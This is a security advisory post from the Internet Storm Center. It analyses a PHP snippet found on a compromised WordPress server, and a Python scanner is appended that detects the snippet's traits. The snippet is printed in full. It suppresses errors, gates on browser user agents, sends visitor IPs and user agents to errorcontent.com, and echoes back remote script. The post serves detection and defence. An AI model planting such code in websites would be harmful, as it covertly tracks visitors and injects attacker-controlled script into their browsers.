SANS ISC Internet Storm Center
Possible Wordpress Botnet C&C: errorcontent.com

Published: 2015-05-26
Last Updated: 2015-05-26 16:36:15 UTC
by Johannes Ullrich (Version: 1)

Thanks to one of our readers for sending us this snippet of PHP he found on a Wordpress server (I added some line breaks and comments for readability):

#2b8008#   <-- no idea what this hex value does. I modified it in case it identifies the user submitting this to us.
error_reporting(0); /* turn off error reporting */
@ini_set('display_errors',0);  /* do not display errors to the user */
$wp_mezd8610 = @$_SERVER['HTTP_USER_AGENT']; /* retrieve the user agent string */


/* only run the code if this is Chrome or IE and not a "bot" */

if (( preg_match ('/Gecko|MSIE/i', $wp_mezd8610) && !preg_match ('/bot/i', $wp_mezd8610)))
{  

# Assemble a URL like http://errorcontent.com/content?ip=[client ip]&referer=[server host name]&ua=[user agent]

  $wp_mezd098610="http://"."error"."content".".com/"."content"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_mezd8610);

# check if we have the curl extension installed 

if (function_exists('curl_init') && function_exists('curl_exec')) {

$ch= curl_init();
curl_setopt ($ch, CURLOPT_URL,$wp_mezd098610);
curl_setopt ($ch, CURLOPT_TIMEOUT, 20);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$wp_8610mezd = curl_exec ($ch);
curl_close($ch);}

# if we don't have curl, try file_get_contents which requires allow_url_fopen.

elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_8610mezd = @file_get_contents($wp_mezd098610);}

# or try fopen as a last resort
elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_8610mezd=@stream_get_contents(@fopen($wp_mezd098610, "r"));}}

if (substr($wp_8610mezd,1,3) === 'scr'){ echo $wp_8610mezd; }

# The data retrieved will be echoed back to the user if the three characters after its first one are "scr" (substr offset 1, length 3).

I haven't been able to retrieve any content from errorcontent.com. Has anybody else seen this code, or is able to retrieve content from errorcontent.com ?

According to whois, errorcontent.com is owned by a Chinese organization. It currently resolves to 37.1.207.26, which is owned by a British ISP. Any help as to the nature of this snippet will be appreciated.
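As an added example (not part of the diary or of the reader's submission), here is a small Python scanner for the traits of this snippet in PHP source: it first re-joins concatenated double-quoted fragments so a hostname split into "error"."content".".com" reads as one string again, then checks for the error suppression, the browser-only/not-bot user-agent gate, the ip/ua beacon, and the 'scr' check at offset 1 that gates the echo. The embedded sample PHP is constructed from the lines posted above; the indicator names and scoring are my own.

```python
import re

# Constructed sample: the gating, beacon and echo lines of the snippet
# posted in the diary, embedded here so the scanner runs offline.
SAMPLE_PHP = r'''<?php
error_reporting(0);
@ini_set('display_errors',0);
$wp_mezd8610 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_mezd8610) && !preg_match ('/bot/i', $wp_mezd8610)))
{
  $wp_mezd098610="http://"."error"."content".".com/"."content"."/?ip=".$_SERVER['REMOTE_ADDR']."&ua=".urlencode($wp_mezd8610);
  if (function_exists('curl_init')) { $ch=curl_init(); curl_setopt($ch, CURLOPT_URL,$wp_mezd098610); $wp_8610mezd=curl_exec($ch); }
}
if (substr($wp_8610mezd,1,3) === 'scr'){ echo $wp_8610mezd; }
'''
# Constructed benign control: no suppression, no gate, no beacon.
CLEAN_PHP = "<?php\nerror_reporting(E_ALL);\necho htmlspecialchars($_GET['q']);\n"

# "a" . "b" -> "ab"  (heuristic: assumes no double quotes inside single-quoted strings)
CONCAT = re.compile(r'"([^"\\]*)"\s*\.\s*"([^"\\]*)"')

INDICATORS = {
    "errors silenced":             re.compile(r"error_reporting\(0\).*?ini_set\('display_errors',\s*0\)", re.S),
    "browser-only, bot-excluded":  re.compile(r"preg_match\s*\(\s*'/Gecko\|MSIE/i'.*?!preg_match\s*\(\s*'/bot/i'", re.S),
    "beacons client ip and ua":    re.compile(r"HTTP_USER_AGENT.*?REMOTE_ADDR|REMOTE_ADDR.*?HTTP_USER_AGENT", re.S),
    "echo gated on 'scr' at offset 1": re.compile(r"substr\([^)]*,\s*1,\s*3\)\s*===\s*'scr'"),
}
# Hostname of any double-quoted URL literal that survives de-concatenation.
HOST = re.compile(r'"https?://([^"/]+)')

def join_literals(src: str) -> str:
    """Collapse chained double-quoted literals until nothing changes, so the
    split-up hostname in the sample reappears as one string."""
    prev = None
    while prev != src:
        prev, src = src, CONCAT.sub(r'"\1\2"', src)
    return src

def scan(src: str) -> dict:
    """Run every indicator over the de-concatenated source; return which fired,
    a simple count, and the hostnames the snippet would contact."""
    flat = join_literals(src)
    hits = {name: bool(rx.search(flat)) for name, rx in INDICATORS.items()}
    return {"hits": hits, "score": sum(hits.values()), "hosts": sorted(set(HOST.findall(flat)))}

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_PHP), ("clean", CLEAN_PHP)):
        print(label, scan(src))
```

Run it over a tree of PHP files by feeding each file's text to scan(); a score of 3 or more, or any recovered hostname you do not recognise, is worth a manual look.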

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn
